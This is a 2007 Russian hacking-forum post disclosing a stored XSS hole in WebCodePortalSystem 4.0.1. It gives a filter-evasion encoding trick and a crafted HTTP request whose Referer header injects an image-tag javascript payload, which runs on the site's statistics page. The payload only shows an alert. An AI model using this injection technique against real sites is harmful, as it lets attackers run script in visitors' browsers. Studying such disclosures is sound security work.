
21.12.2007, 19:30
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
WebCodePortalSystem v.4.0.1
[Активная XSS]
Достаточно быстро залатали предыдущие уязвимости, но латали на скорую руку, судя по всему, и активная XSS попрежнему осталась, хотя с ней будет немного больше гемора чем было раньше, но это уже мелочи.
Для обхода филтра воспользуемся вот этим удобным скриптом с помощью которого можно обойти многие фильтры:
http://ha.ckers.org/xss.html#XSScalc
Закодируем нашу строку:
javascript:alert('test'); -> Character Encoding Calculator -> вводим сюда скрипт: ASCII Text -> и получаем его здесь Decimal Value: HTML (without semicolons): -> javascript:alert('test');
Формируем пакет:
Код:
GET /index.php HTTP/1.1
Host: test2.ru
Referer: http://<IMG SRC=javascript:alert('test');>
Connection: close
Отправляем его и видим результат работы скрипта на страничке со статистикой:
Статистика -> Переходы
Последний раз редактировалось Grey; 21.12.2007 в 20:39..
|
|
|